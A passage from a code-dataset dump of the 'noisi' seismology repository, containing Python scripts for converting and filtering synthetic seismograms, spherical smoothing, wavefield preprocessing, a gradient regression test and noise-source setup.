\n # DATASET NR 1: STATS\n stats = f_out.create_dataset('stats',data=(0,))\n stats.attrs['reference_station'] = '{}.{}'.format(net,sta)\n stats.attrs['data_quantity'] = config['synt_data']\n stats.attrs['ntraces'] = ntraces\n stats.attrs['Fs'] = Fs\n stats.attrs['nt'] = int(ntimesteps)\n \n # DATASET NR 2: Source grid\n sources = f_out.create_dataset('sourcegrid',data=f_sources[0:2])\n lat1 = geograph_to_geocent(float(lat))\n lon1 = float(lon)\n rec1 = instaseis.Receiver(latitude=lat1,longitude=lon1)\n \n # DATASET Nr 3: Seismograms itself\n traces = f_out.create_dataset('data',(ntraces,ntimesteps),dtype=np.float32)\n if channel[-1] == 'Z':\n \tc_index = 0\n elif channel[-1] == 'R':\n \tc_index = 1\n elif channel[-1] == 'T':\n \tc_index = 2\n\nelse:\n f_out = h5py.File(f_out_name, \"r+\")\n startindex = len(f_out['data']) \n\n\n# jump to the beginning of the trace in the binary file\nfor i in range(startindex,ntraces):\n if i%1000 == 1:\n print('Converted %g of %g traces' %(i,ntraces))\n # read station name, copy to output file\n \n lat_src = geograph_to_geocent(f_sources[1,i])\n lon_src = f_sources[0,i]\n\n ######### ToDo! Right now, only either horizontal or vertical component sources ##########\n if c_index in [1,2]:\n fsrc = instaseis.ForceSource(latitude=lat_src,\n longitude=lon_src,f_t=1.e09,f_p=1.e09)\n elif c_index == 0:\n fsrc = instaseis.ForceSource(latitude=lat_src,\n longitude=lon_src,f_r=1.e09)\n\n values = db.get_seismograms(source=fsrc,receiver=rec1,dt=1./Fs)\n \n if c_index in [1,2]:\n \tbaz = gps2dist_azimuth(lat_src,lon_src,lat,lon)[2]\n \tvalues.rotate('NE->RT',back_azimuth=baz)\n\n values = values[c_index]\n\n if config['synt_data'] in ['VEL','ACC']:\n \tvalues.differentiate()\n \tif config['synt_data'] == 'ACC':\n \t\tvalues.differentiate()\n # Save in traces array\n traces[i,:] = values.data\n \n \nf_out.close()\n\n"
},
{
"alpha_fraction": 0.6412961483001709,
"alphanum_fraction": 0.6684250235557556,
"avg_line_length": 36.91428756713867,
"blob_id": "924278ed64cf472df0bb8bdb8ca59b2c0241cf94",
"content_id": "718aa0bb303568a04a8cd300ba2d5d74ef49a944",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 35,
"path": "/noisi/test/test_gradient.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\n\ndef test_gradient():\n # copy data\n os.mkdir('test/testdata/testsrc/step_0/grad')\n os.mkdir('test/testdata/testsrc/step_0/kern')\n os.system('cp test/testdata/testsrc/step_0/kern_archived/NET.STA1..CHA--NET.STA2..CHA.npy \\\n test/testdata/testsrc/step_0/kern/NET.STA1..CHA--NET.STA2..CHA.0.npy')\n os.system('cp test/testdata/testsrc/step_0/ln_energy_ratio.measurement_archived.csv\\\n test/testdata/testsrc/step_0/ln_energy_ratio.0.measurement.csv')\n os.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5\\\n test/testdata/testsrc/step_0/starting_model.h5')\n\n\n # run forward model\n os.system('noisi gradient test/testdata/testsrc/ 0')\n\n # assert the results are the same\n # ToDo: path\n \n g1 = np.load('test/testdata/testsrc/step_0/grad_archived/grad_all.npy')[0,:]\n g2 = np.load('test/testdata/testsrc/step_0/grad/grad_all.npy')[0,:]\n \n print(g1 == g2)\n print((g1 == g2).sum())\n\n assert (g1 == g2).sum() == len(g2)\n \n \n # remove stuff\n os.system('rm -rf test/testdata/testsrc/step_0/grad/')\n os.system('rm -rf test/testdata/testsrc/step_0/kern/')\n os.system('rm test/testdata/testsrc/step_0/starting_model.h5')\n os.system('rm test/testdata/testsrc/step_0/ln_energy_ratio.0.measurement.csv')\n"
},
{
"alpha_fraction": 0.6144301891326904,
"alphanum_fraction": 0.6288604140281677,
"avg_line_length": 32.63181686401367,
"blob_id": "a0b83c70cef9a011002c919c4482c4b5a7c6ec01",
"content_id": "0373ac14be73e3005de87e0e701b0b23b164b5e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7415,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 220,
"path": "/noisi/util/parse_specfem_output.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "#!/users/lermert/anaconda2/bin/python\n# path to python has to be included here\n\n# A script to filter and downsample binary specfem output using python\n# This script is specially adapted to the specfem unformatted fortran binary output.\n\n\n# Tasks: \n# - Get filter coefficients\n# - read in trace\n# - apply filter to trace\n# - apply downsampling or interpolation to trace\n# - append trace to a new binary file \n# - parallelize in a sensible way\n# - include an option to extract only the z component\n# - transfer output to hdf5\n\nfrom mpi4py import MPI\nfrom scipy.signal import iirfilter, lfilter\nfrom obspy import Trace\nfrom obspy.signal.invsim import cosine_taper\nimport numpy as np\nimport os\nimport sys\nfrom warnings import warn\nfrom scipy.signal import cheb2ord, cheby2\ntry:\n from scipy.signal import zpk2sos, sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\n from obspy.signal._sosfilt import _zpk2sos as zpk2sos\n#ToDo: build in a more stable filter (?); cut off the first x seconds before zero time; take derivative! \n# ToDo: Write directly to hdf5? (The nice thing about unformatted bin is convenient concatenating)\n\n\n#- User input: -----------------------------------------\n#-------------------------------------------------------\nntimesteps=95400 # nr. of time steps, find in specfem output\nduration= 300.430176 * 60. + 100. #duration of synthetics in seconds (look up in specfem output, it's given in minutes there)\noffset_seconds = 100. # This is the added time specfem adds before t=0 to account for the source 'rise time'.\nncomponents = 3\nnbytes_stationname = 512\nsize_of_float = 4\ndtype_output = 'f4'\noutput_quantity = 'VEL'\noutput_directory = '/scratch/daint/lermert/output_decimated/'\nchannel = 'MXZ' # 'all' or specify channels as in specfem output, e.g. 'MXZ'\nfreq = 0.05 # Lowpass corner\nfs_new = 0.4 # Interpolate to new sampling rate in Hz \n\n#------------------------------------------------------\n#------------------------------------------------------\n\ndef cheby2_lowpass(df,freq,maxorder=8):\n # From obspy\n nyquist = df * 0.5\n # rp - maximum ripple of passband, rs - attenuation of stopband\n rp, rs, order = 1, 96, 1e99\n ws = freq / nyquist # stop band frequency\n wp = ws # pass band frequency\n # raise for some bad scenarios\n if ws > 1:\n ws = 1.0\n msg = \"Selected corner frequency is above Nyquist. 
\" + \\\n \"Setting Nyquist as high corner.\"\n warnings.warn(msg)\n while True:\n if order <= maxorder:\n break\n wp = wp * 0.99\n order, wn = cheb2ord(wp, ws, rp, rs, analog=0)\n return cheby2(order, rs, wn, btype='low', analog=0, output='zpk')\n \n \n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\nprint(\"Hello from rank \",rank)\nprint(\"Size is \",size)\n\ntry:\n f_in = sys.argv[1]\nexcept IndexError:\n msg = 'Usage: python decimate_synthetics.py <path to input file>'\n raise ValueError(msg)\n \nprint('Setting output file name according to input file name provided on command line:')\nstation = os.path.splitext(os.path.basename(f_in))[0]\nf_out = \"%s..%s.%gHz.bin_%g\" %(station,channel,fs_new,rank)\ndir_out = os.path.join(output_directory,'{}..{}'.format(station,channel))\nf_out = os.path.join(dir_out,f_out)\nif rank == 0:\n os.system('mkdir -p '+dir_out)\ncomm.Barrier()\n\nprint(f_out)\n# Separate output files for different cores - otherwise would have to keep track of sequence of traces\nf_out = open(f_out,'wb')\n\n\n# Record lengths:\nnbytes_trace = nbytes_stationname + 8 + ntimesteps * \\\nsize_of_float * 2 + 16\nnbytes_station = nbytes_trace * ncomponents\n\n# Number of records actually contained\nnstations = os.path.getsize(f_in) / nbytes_station\nprint('Number of station records: '+nstations)\n\n\n# Open files:\nf_in = open(f_in,'rb')\n\n# Read an example time axis\nf_in.seek(nbytes_stationname+8+4)\nexamp_time = np.zeros(ntimesteps)\nexamp_time = np.fromfile(f_in,dtype='f',count=ntimesteps)\n \nprint('Prescribed duration: '+ duration)\nprint('Inferred duration: ', examp_time[-1]-examp_time[0])\n#dt = np.sum(np.abs(examp_time[:-1])) / (ntimesteps-1)\ndt = duration / ntimesteps\ndt_test = abs(examp_time[-1]-examp_time[0]) / ntimesteps\n\nif dt_test != dt and rank == 0:\n msg = 'Small discrepancy between inferred and prescribed sampling rate:' \n warn(msg)\n print(dt)\n print(dt_test)\n \n# Determine the sampling rate\nfs_old = 1./dt\n\n# Get filter coeff\nz, p, k = cheby2_lowpass(fs_old,freq)\nsos = zpk2sos(z, p, k)\n\n# Determine which channels to save...\nif channel is not 'all':\n cha_incr = 3\n if channel == 'MXN':\n cha_offset = 0\n elif channel == 'MXE':\n cha_offset = 1\n elif channel == 'MXZ':\n cha_offset = 2\nelse:\n cha_incr = 1\n cha_offset = 0 \n\ncounter = 0\ntotal_traces = ncomponents * nstations\n\nfor ns in range(rank,nstations,size): \n for nc in range(cha_offset,ncomponents,cha_incr):\n \n if counter%1000 == 0: \n print('Completed %s out of approx %s traces' %(counter,round(total_traces/size)))\n \n # jump to the beginning of the entry in the binary file\n f_in.seek(ns * nbytes_station + nc * nbytes_trace + 4)\n \n # read station name, copy to output file\n staname=f_in.read(nbytes_stationname)\n if channel != 'all' and channel not in staname.split('.'):\n msg = 'Something went wrong with reading, please double check\\\n number of time steps and other user input.'\n raise ValueError(msg)\n \n \n # Numpy arrays are double precision by default, maybe use single?\n values = np.zeros(ntimesteps,dtype=np.dtype(dtype_output))\n infnr = np.zeros(2,dtype=np.dtype(dtype_output))\n \n # Jump over the station name and the time axis record....\n f_in.seek( ns * nbytes_station + nc * nbytes_trace + nbytes_stationname +\\\n 8 + ntimesteps * size_of_float + 12 )\n \n #for nt in range(ntimesteps):\n # values[nt] = np.fromfile(f_in,dtype=dtype_output,count=1)\n values = np.fromfile(f_in,dtype=dtype_output,count=ntimesteps)\n \n tr = 
Trace(data=values)\n \n \n # Filter and downsample\n # Since the same filter will be applied to all synthetics consistently, non-zero-phase should be okay\n # ToDo: Think about whether zerophase would be better\n \n # taper first\n #ToDo: Discuss with Andreas whether this tapering makes sense!\n tr.taper(type='cosine',max_percentage=0.001)\n tr.data = sosfilt(sos,tr.data)\n tr.stats.sampling_rate = fs_old\n tr.interpolate(fs_new)\n \n # Differentiate\n if output_quantity == 'VEL' or output_quantity == 'ACC':\n tr.differentiate()\n if output_quantity == 'ACC':\n tr.differentiate()\n \n \n # Remove the extra time that specfem added\n tr.trim(starttime = tr.stats.starttime+offset_seconds)\n \n # Set data type\n tr.data = tr.data.astype(dtype_output)\n \n\n infnr[0] += tr.stats.npts\n infnr[1] += tr.stats.sampling_rate\n \n f_out.write(staname)\n infnr.tofile(f_out)\n tr.data.tofile(f_out)\n counter +=1\nprint('New nr. of time steps after interpolation: '+ tr.stats.npts)\nf_out.close()\n \n\n \n\n"
},
{
"alpha_fraction": 0.5676073431968689,
"alphanum_fraction": 0.5899386405944824,
"avg_line_length": 23.359281539916992,
"blob_id": "1a03f2ffc904ddfa48082d7c48522f5b2233e9a8",
"content_id": "218ec5ea16507ed799e79ddc189bf31b06e0ee9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4075,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 167,
"path": "/noisi/util/smoothing.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom math import sqrt, pi\nimport sys\nfrom mpi4py import MPI\nfrom warnings import warn\ntry:\n from noisi.util.plot import plot_grid\nexcept:\n pass\n# Try yet another: sort of Gaussian convolution, but determining the distance\n# in cartesian coordinates.\n # initialize parallel comm\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n\ndef get_distance(gridx,gridy,gridz,x,y,z):\n #def distance_function(x1,y1,z1,x2,y2,z2):\n # return sqrt((x2-x1)**2+(y2-y1)**2+(z2-z1)**2)\n #dist = np.array([distance_function()])\n xd = gridx - x\n yd = gridy - y\n zd = gridz - z\n \n return np.sqrt(np.power(xd,2)+np.power(yd,2)+np.power(zd,2))\n\n\n\ndef smooth_gaussian(values,coords,rank,size,sigma,r=6371000.,threshold=1e-9):\n\n # coords format: (lon,lat)\n\n # step 1: Cartesian coordinates of map\n theta = np.deg2rad(-coords[1] + 90.) \n phi = np.deg2rad(coords[0] + 180.)\n\n x = r*np.sin(theta) * np.cos(phi)\n y = r*np.sin(theta) * np.sin(phi)\n z = r*np.cos(theta)\n\n\n v_smooth = np.zeros(values.shape)\n\n\n a = 1./(sigma*sqrt(2.*pi))\n \n for i in range(rank,len(values),size):\n \n xp,yp,zp = (x[i],y[i],z[i])\n dist = get_distance(x,y,z,xp,yp,zp)\n weight = a * np.exp(-(dist)**2/(2*sigma**2))\n #print(weight.max())\n # I just had an idea for 'sparsity' here; test this:\n\n idx = weight >= threshold\n\n if idx.sum() == 0:\n warn('No weights above threshold, reset threshold.')\n v_smooth[i] = 0.\n\n else:\n v_smooth[i] = np.sum(np.multiply(weight[idx],values[idx])) / idx.sum()\n \n\n return v_smooth\n\n\ndef apply_smoothing_sphere(rank,size,values,coords,sigma,cap=95,threshold=1.e-12):\n\n\n sigma = float(sigma)\n cap = float(cap)\n threshold = float(threshold)\n\n # clip\n perc_up = np.percentile(values,cap,overwrite_input=False)\n perc_dw = np.percentile(values,100-cap,overwrite_input=False)\n values = np.clip(values,perc_dw,perc_up)\n\n \n\n # get the smoothed map; could use other functions than Gaussian here\n v_s = smooth_gaussian(values,coords,rank,size,sigma,threshold=threshold)\n \n\n \n comm.barrier()\n \n # collect the values\n print('Gathering...')\n v_s_all = comm.gather(v_s,root=0)\n # rank 0: save the values\n if rank == 0:\n \n print('Gathered.')\n v_s = np.zeros(v_s.shape)\n for i in range(size):\n\n v_s += v_s_all[i]\n \n return(v_s)\n\ndef test_gauss_smoothing(sourcegrid,map):\n #\n grd = np.load(sourcegrid)[:,0:10000]\n v = np.ones(grd.shape[1])\n ihalf = grd.shape[1] // 2\n v[ihalf:] = 10\n np.save('temp_coord.npy',grd)\n np.save('temp_vals.npy',v)\n plot_grid(grd[0],grd[1],v)\n\n smooth_map = apply_smoothing_sphere('temp_vals.npy',\n 'test','temp_coord.npy',500000)\n print(smooth_map.shape)\n\n plot_grid(grd[0],grd[1],smooth_map)\n\n\ndef smooth(inputfile,outputfile,coordfile,sigma,cap,thresh):\n\n for ixs in range(len(sigma)):\n sigma[ixs] = float(sigma[ixs])\n\n\n\n coords = np.load(coordfile)\n values = np.array(np.load(inputfile),ndmin=2)\n smoothed_values = np.zeros(values.shape)\n \n\n for i in range(values.shape[0]):\n\n array_in = values[i,:]\n try:\n sig = sigma[i]\n except IndexError:\n sig = sigma[-1]\n\n v = apply_smoothing_sphere(rank,size,array_in,\\\n coords,sig,cap,threshold=thresh)\n if rank == 0:\n smoothed_values[i,:] = v\n print(np.isnan(smoothed_values).sum())\n\n if rank == 0:\n np.save(outputfile,smoothed_values)\n\n\n\nif __name__=='__main__':\n\n # pass in: input_file, output_file, coord_file, sigma\n # open the files\n inputfile = sys.argv[1]\n outputfile = sys.argv[2]\n coordfile = sys.argv[3]\n 
sigma = sys.argv[4].split(',')\n cap = float(sys.argv[5])\n \n try:\n thresh = float(sys.argv[6])\n except IndexError:\n thresh = 1.e-12\n\n smooth(inputfile,outputfile,coordfile,sigma,cap,thresh)\n\n\n \n"
},
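In formulas, apply_smoothing_sphere clips the input at the cap percentile and then replaces each value v_i by a thresholded Gaussian average over chord distances:

v_i^{\mathrm{smooth}} = \frac{1}{|N_i|} \sum_{j \in N_i} \frac{1}{\sigma \sqrt{2\pi}} \, e^{-d_{ij}^2 / (2 \sigma^2)} \, v_j, \qquad N_i = \{ j : w_{ij} \ge \mathrm{threshold} \}

where d_{ij} is the 3-D Cartesian (chord) distance between grid points i and j computed in get_distance. Note that the normalisation divides by the count |N_i| of contributing points rather than by the sum of their weights.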
{
"alpha_fraction": 0.5163956880569458,
"alphanum_fraction": 0.5213557481765747,
"avg_line_length": 34.3564338684082,
"blob_id": "4982bde2eda8dd5dec3808416db464659664e4e5",
"content_id": "06e74e8ade5b85334e555bbc5e70a21fc1668cd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3629,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 101,
"path": "/noisi/scripts/run_preprocessing.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nfrom noisi import WaveField\nimport os\nfrom glob import glob\nimport json\n\ndef run_preprocessing(source_config):\n\n configfile = os.path.join(source_config['project_path'],\n 'config.json')\n config = json.load(open(configfile))\n \n files = glob(os.path.join(config['wavefield_path'],'*.h5'))\n processed_path = os.path.join(source_config['source_path'],\n 'wavefield_processed')\n \n if not os.path.exists(processed_path):\n os.mkdir(processed_path)\n \n # very simple embarrassingly parallel loop\n comm = MPI.COMM_WORLD\n size = comm.Get_size()\n rank = comm. Get_rank()\n\n files = files[rank::size]\n \n for file in files:\n\n newfile = os.path.join(processed_path, os.path.basename(file))\n\n if os.path.exists(newfile):\n print(\"File {} was already processed, skipping.\".format(os.path.basename(file)))\n continue\n\n else:\n print(\"Preprocessing {}\".format(os.path.basename(file)))\n \n\n \n if source_config['preprocess_truncate_sec'] is not None:\n \n # truncating\n \n with WaveField(file) as wf:\n wf.truncate(newfile,float(source_config['preprocess_truncate_sec']))\n\n\n if source_config['preprocess_decimation_factor'] is not None:\n\n # Already truncated file?\n if os.path.exists(newfile):\n newfile_temp = newfile + '.temp'\n with WaveField(newfile) as wf:\n wf.decimate(decimation_factor=source_config['preprocess_decimation_factor'],\n outfile=newfile_temp,\n taper_width=0.005)\n os.system(\"mv {} {}\".format(newfile_temp,newfile))\n else:\n with WaveField(file) as wf:\n wf.decimate(decimation_factor=source_config['preprocess_decimation_factor'],\n outfile=newfile,\n taper_width=0.005)\n \n\n\n\n\n \n if source_config['preprocess_filter_kind'] == 'bandpass':\n\n # The file has been written previously by wavefield.truncate\n if os.path.exists(newfile):\n with WaveField(newfile,w='a') as wf:\n wf.filter_all(\n source_config['preprocess_filter_kind'],\n overwrite=True,\n freqmin=source_config['preprocess_filter_params'][0],\n freqmax=source_config['preprocess_filter_params'][1],\n corners=source_config['preprocess_filter_params'][2],\n zerophase=source_config['preprocess_filter_params'][3])\n\n else:\n # The file still has to be written\n with WaveField(file) as wf:\n wf.filter_all(\n source_config['preprocess_filter_kind'],\n overwrite=False,\n freqmin=source_config['preprocess_filter_params'][0],\n freqmax=source_config['preprocess_filter_params'][1],\n corners=source_config['preprocess_filter_params'][2],\n zerophase=source_config['preprocess_filter_params'][3],\n outfile=newfile)\n\n\n\n # filtering type,overwrite=False,zerophase=True,**kwargs\n #with WaveField(newfile) as wf:\n \n \n \n # wf.filter_all()\n \n \n \n \n \n \n"
},
{
"alpha_fraction": 0.63331139087677,
"alphanum_fraction": 0.6540487408638,
"avg_line_length": 29.3799991607666,
"blob_id": "c36504a59793e9464a2e7d280c623009dfb052f6",
"content_id": "b2aba3554790ceff57c8880da04f65890f515038",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6076,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 200,
"path": "/noisi/util/make_synthetic_data.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# # Make synthetic data from modelled data\n\n# NOTE: This Jupyter Notebook should be run in /project_name/source_name until arguments can be put in externally.\n# Expects stationlist.csv, modelled correlations\n\n# The aim is to calculate the kernels. To do this, observed correlation data is necessary. This script converts modelled data to synthetic data.\n\nimport os\nimport glob\nimport shutil\nimport obspy\nimport pandas as pd\nfrom obspy import read\nfrom obspy.geodetics import gps2dist_azimuth\nimport numpy as np\nimport sys\nfrom glob import glob\nfrom obspy.core import AttribDict\n\n\n\n# For dataless conversion set it to true\ndataless = True\ncorr_filt_sectionplot = True\n\n# Get Project name\nproject_name = os.path.basename(os.path.dirname(os.getcwd()))\n# print(project_name)\n\n# first get paths to different files\npath_stations = ('../stationlist.csv')\npath_model = ('./step_0/corr/')\npath_obs = ('./observed_correlations/')\n\n# ABOVE CAN BE CHANGED FOR PYTHON SCRIPT TO RUN WITH INPUT ARGUMENTS, see Laura's code\n\nif dataless:\n # delete files in observed_correlations folder if necessary\n for files in glob(os.path.join(path_obs,'*')):\n os.remove(files)\n # copy files from the synthetic correlations to the observed correlations '/Source_1/observed_correlations/'\n for files in glob(os.path.join(path_model,'*.sac')):\n shutil.copy(files,path_obs)\n print('Copied:',files)\n\n\n# Rename files as noisi expects different filename\nfor filename in glob(os.path.join(path_obs,'*.sac*')):\n # make sure they're not renamed if they've already been renamed\n if filename.endswith(project_name + '.sac'): \n break\n else:\n # get filename without extension\n filename_wo_ext = os.path.splitext(filename)[0]\n ext = os.path.splitext(filename)[1]\n # change -- to . and add project name and extension\n filename_1 = filename_wo_ext.replace('--','.')\n filename_2 = filename_1 + '.' + project_name + ext\n # rename the file\n os.rename(filename,filename_2)\n print('Renamed:', filename_2)\n\n\n# Check metadata in observed_correlations folder\n# load the correlations into a file with obspy\next = '*.sac'\ncorrs_path_obs = os.path.join(path_obs,ext) # get all .sac files in directory\nst = obspy.read(corrs_path_obs) # load all into one stream\n# print(st)\n#print(st[0].stats)\n\n\n# # Laura's code: assign_geodata.py\n\n# Changed the indir and metafile input so it would run in this notebook. \n# For meta = .. 
engine = 'python' has been added.\n\n#indir = sys.argv[1]\n#metafile = sys.argv[2]\nindir = path_obs\nmetafile = '../stationlist.csv'\n\n\nprint(indir)\ntraces = glob(indir+'/*.SAC')\ntraces.extend(glob(indir+'/*.sac'))\nprint('Found traces:\\n')\nprint(traces[0])\nprint('...to...')\nprint(traces[-1])\nprint('\\n')\nprint('Assign geographical information.\\n')\nprint('Number of traces:')\nprint(np.size(traces))\nprint('\\n')\n\nmeta = pd.read_csv(metafile, engine='python')\n\nfor t in traces:\n tr = read(t)\n sta1 = os.path.basename(t).split('.')[1]\n try:\n sta2 = os.path.basename(t).split('--')[1].split('.')[1]\n except IndexError:\n sta2 = os.path.basename(t).split('.')[5]\n print(sta1,sta2)\n lat1 = float(meta[meta['sta']==sta1].iloc[0]['lat'])\n lat2 = float(meta[meta['sta']==sta2].iloc[0]['lat'])\n lon1 = float(meta[meta['sta']==sta1].iloc[0]['lon'])\n lon2 = float(meta[meta['sta']==sta2].iloc[0]['lon'])\n print(lat1,lon1,lat2,lon2)\n \n tr[0].stats.network = os.path.basename(t).split('.')[0]\n tr[0].stats.station = sta1\n tr[0].stats.location = ''\n tr[0].stats.channel = os.path.basename(t).split('.')[3] #os.path.basename(t).split('.')[3].split('--')[0]\n tr[0].stats.sac.stlo = lon1\n tr[0].stats.sac.stla = lat1\n tr[0].stats.sac.evlo = lon2\n tr[0].stats.sac.evla = lat2\n tr[0].stats.sac.kuser0 = meta[meta['sta']==sta2].iloc[0]['net']\n \n tr[0].stats.sac.kevnm = sta2\n tr[0].stats.sac.kuser1 = ''\n try:\n tr[0].stats.sac.kuser2 = os.path.basename(t).split('.')[7] #os.path.basename(t).split('--')[1].split('.')[3]\n except IndexError:\n sta2 = os.path.basename(t).split('.')[7]\n tr[0].stats.sac.user0 = 100. \n #print(lat1 > -90.)\n #print(lat1 < 90.)\n #print(type(lat1))\n #print(float(lat1))\n #print(lat1,lon1,lat2,lon2)\n \n geoinf = gps2dist_azimuth(lat1,lon1,lat2,lon2)\n tr[0].stats.sac.dist = geoinf[0]\n tr[0].stats.sac.az = geoinf[1]\n tr[0].stats.sac.baz = geoinf[2]\n tr[0].stats['distance'] = geoinf[0] # add stats.distance for section plot\n #print(tr[0].stats.keys())\n\n tr.write(t,format='SAC')\n #tr.plot()\n\n\n\n# # Back to my code\n\n# Check the metadata again\next = '*.sac'\ncorrs_path_obs = os.path.join(path_obs,ext) # get all .sac files in directory\nst = obspy.read(corrs_path_obs) # load all into one stream\nprint(st)\nst.plot()\n\n\n# Plot to see correlations\nif corr_filt_sectionplot: \n st1 = obspy.Stream()\n st2 = obspy.Stream()\n # need to set stats.distance\n for tr in traces:\n t = read(tr)\n t[0].stats.distance = t[0].stats.sac.dist\n #print(t[0].stats.distance)\n t_filt = t\n t_filt.filter('bandpass',freqmin=0.02,freqmax=0.05,zerophase = True)\n #t_filt.plot()\n #t_filt.plot(type='section')\n st1 += t_filt\n st2 += t\n\n st1.plot(type='section')\n #st1.spectrogram(log=True,wlen=50) # spectrogram plot for fun\n #st2.plot(type='section')\n\n\n# # Option 1: dataless measurement\n# All the traces are changed to 1 as if the measurement is 0. \n# That means: synthetic data is compared with dataless observed data.\n# Change all trace.data to 1 if dataless = true or leave if dataless = False\n\nprint(st)\n\nif dataless:\n for trace in st:\n size = np.size(trace.data)\n trace.data = np.ones(size)\nelse:\n pass\n\n# plot dataless data\nst.plot()\n\n\n# # Option 2: compare it to a different source distribution\n# Set dataless = False for this\n# For this, a second source distribution is used to calculate the adjoint source.\n# All above steps are run but the trace.data is not changed.\n"
},
{
"alpha_fraction": 0.6245617866516113,
"alphanum_fraction": 0.6363224983215332,
"avg_line_length": 29.80487823486328,
"blob_id": "e61500d6a8fe2ebbf38df473880ba6773ea2b712",
"content_id": "784c93b00f9a8591688f6fd045760663843da8ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8843,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 287,
"path": "/noisi/util/setup_noisesource.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\n\nimport numpy as np\nfrom obspy.geodetics import gps2dist_azimuth\nfrom obspy.signal.invsim import cosine_taper\nimport matplotlib.pyplot as plt\nimport h5py\nfrom noisi import WaveField\nimport json\nfrom glob import glob\nimport os\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\nfrom scipy.signal import hann, iirfilter\ntry:\n from scipy.signal import freqz_zpk\nexcept ImportError:\n from noisi.borrowed_functions.scipy_filter_design import freqz_zpk\nfrom noisi.util.geo import get_spherical_surface_elements\n\n##################################################################\n# USER INPUT\n##################################################################\n# path to project and source model\nprojectpath = '../'\nsourcepath = '.'\n\n# geography - a sequence of distributions 'homogeneous', 'ocean',\n# 'gaussian_blob' in any order. The order has to match with the \n# order od the list of spectra in params_spectra, i.e. the first \n# distribution will be assigned the first spectrum, the second \n# distribution the second spectrum, etc. \n# Similarly, the first 'gaussian_blob' will be assigned the first\n# set of parameters in params_gaussian_blobs, and so on.\ndistributions = ['homogeneous']\n\n# Resolution of the coastlines (only relevant for ocean distributions)\n# (see basemap documentation)\n# Use coarser for global and finer for regional models\ncoastres = 'c' \n\n# Geographic gaussian blobs. Will only be used if 'gaussian_blob'\n# is found in the list of distributions. Will be used\n# in order of appearance\nparams_gaussian_blobs = [{'center':(-10.,0.),'sigma_radius_m':2000000.,\n'rel_weight':2.,'only_ocean':True}]\n\n\n# Further parameters are pulled out of the measr_config file.\n###############################################################################\n\ngrd = np.load(os.path.join(projectpath,'sourcegrid.npy'))\nntraces = np.shape(grd)[-1]\nprint('Loaded source grid')\n\n\nconfig = json.load(open(os.path.join(projectpath,'config.json')))\nsource_config = json.load(open(os.path.join(sourcepath,'source_config.json')))\nmeasr_config = json.load(open(os.path.join(sourcepath,'measr_config.json')))\nprint('Loaded config files.')\n\n\n#if len(distributions) != len(measr_config['bandpass']):\n# raise NotImplementedError('Currently, geographic basis functions\\\n#are not yet available and the number of distributions must be == \\\n#the number of spectral basis functions.')\n\n\nif source_config['preprocess_do']:\n ext = '*.h5'\n wavefield_path = os.path.join(sourcepath,'wavefield_processed')\nelse:\n ext = '*.h5'\n wavefield_path = config['wavefield_path']\n\n\nwfs = glob(os.path.join(wavefield_path,ext))\nif wfs != []:\n print('Found wavefield.')\n with WaveField(wfs[0]) as wf:\n df = wf.stats['Fs']\n nt = wf.stats['nt']\n \nelse:\n df = float(input('Sampling rate of synthetic Greens functions in Hz?\\n'))\n nt = int(input('Nr of time steps in synthetic Greens functions?\\n'))\n\n\n\n\n\n#s for the fft is larger due to zeropadding --> apparent higher frequency sampling\\n\",\n # n = next_fast_len(2*nt-1)\nn = next_fast_len(2*nt-1) \nfreq = np.fft.rfftfreq(n,d=1./df)\ntaper = cosine_taper(len(freq),0.01)\nprint('Determined frequency axis.')\n\ndef get_distance(grid,location):\n def f(lat,lon,location):\n return abs(gps2dist_azimuth(lat,lon,location[0],location[1])[0])\n dist = np.array([f(lat,lon,location) for lat,lon in zip(grid[1],grid[0])])\n return 
dist\n\n# Use Basemap to figure out where ocean is\ndef get_ocean_mask():\n print('Getting ocean mask...')\n from mpl_toolkits.basemap import Basemap\n latmin = grd[1].min()\n latmax = grd[1].max()\n lonmin = grd[0].min()\n lonmax = grd[0].max()\n print(\"Latitude {}--{},\\n\\\nLongitude {}--{}\".format(\n round(latmin,2),\n round(latmax,2),\n round(lonmin,2),\n round(lonmax,2)))\n m = Basemap(rsphere=6378137,resolution=coastres,projection='cea',\n llcrnrlat=latmin,urcrnrlat=latmax,\n llcrnrlon=lonmin,urcrnrlon=lonmax)\n (east,north) = m(grd[0],grd[1])\n\n ocean_mask = [not m.is_land(x,y) for (x,y) in zip(east,north)]#list(map(lambda x,y: not m.is_land(x,y),zip(x,y)))\n return np.array(ocean_mask)\n\n\n \n\ndef get_geodist(disttype,gaussian_params=None):\n\n if disttype == 'gaussian':\n dist = get_distance(grd,gaussian_params['center'])\n gdist = np.exp(-(dist)**2/(2*gaussian_params['sigma_radius_m']**2))\n\n if gaussian_params['only_ocean']:\n if not 'ocean_mask' in locals():\n ocean_mask = 